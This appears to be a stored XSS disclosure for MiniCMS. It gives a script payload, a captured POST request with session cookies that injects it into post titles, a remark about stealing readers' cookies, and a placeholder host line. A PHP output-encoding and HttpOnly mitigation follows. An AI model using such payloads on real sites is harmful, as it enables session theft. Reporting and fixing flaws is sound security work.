This is a stored XSS vulnerability.
First, we should land on (http://127.0.0.1/test/MiniCMS-master/mc-admin/),
write an article and publish it.
Payload: "/><script>confirm(document.cookie)</script>
I think you can see the following picture to know more.
POST /test/MiniCMS-master/mc-admin/post-edit.php?id=qhywyf HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/test/MiniCMS-master/mc-admin/post-edit.php?id=qhywyf
Content-Type: application/x-www-form-urlencoded
Content-Length: 274
Cookie: mc_token=c30807e6587ade285ba7ade9f881b3d7; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6
Connection: keep-alive
Upgrade-Insecure-Requests: 1

IS_POST_BACK=&title="/><script>confirm(document.cookie)</script>&content="/><script>confirm(document.cookie)</script>&tags=&year=2018&month=04&day=22&hourse=11&minute=44&second=00&can_comment=1&state=publish&id=qhywyf&save=%E4%BF%9D%E5%AD%98

When we publish the article, we can see it from the homepage.

If people read our articles, we can easily get their cookie.

src=http://xxx.xxx.xxx.xxx/
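A mitigation sketch for the issue reported above, added here as an example and not taken from the MiniCMS code base: the function names and the markup are hypothetical, and it assumes the title and content are meant to be shown as plain text. It shows the stored value echoed raw beside the same output encoded at render time, plus an HttpOnly flag on the mc_token cookie seen in the request.

```php
<?php
// Added example, not MiniCMS code: function names and markup are hypothetical.

// Payload taken from the report above (constructed input for this demo).
$payload = '"/><script>confirm(document.cookie)</script>';

// Encode for both HTML text and quoted-attribute contexts.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Before: the stored value is echoed raw into an attribute and into the body.
function render_unsafe(string $title, string $content): string
{
    return '<input name="title" value="' . $title . '"/>' . "\n"
         . '<div class="post">' . $content . '</div>';
}

// After: same markup, every stored value encoded at output time.
function render_safe(string $title, string $content): string
{
    return '<input name="title" value="' . e($title) . '"/>' . "\n"
         . '<div class="post">' . e($content) . '</div>';
}

// Defence in depth for the cookie-theft impact: keep the token cookie out of
// reach of document.cookie. Call before any output in a real request handler.
function issue_token_cookie(string $token): bool
{
    return setcookie('mc_token', $token, [
        'httponly' => true,
        'samesite' => 'Lax',
        'path'     => '/',
    ]);
}

echo render_unsafe($payload, $payload), "\n\n";
$safe = render_safe($payload, $payload);
echo $safe, "\n";

// The encoded output must not contain a live script tag or a raw quote
// that closes the value attribute early.
if (strpos($safe, '<script') !== false || strpos($safe, 'value=""') !== false) {
    throw new RuntimeException('output encoding failed');
}
```

If the content field is supposed to accept HTML, escaping alone is not enough and an allowlist-based HTML sanitizer is needed for that field instead.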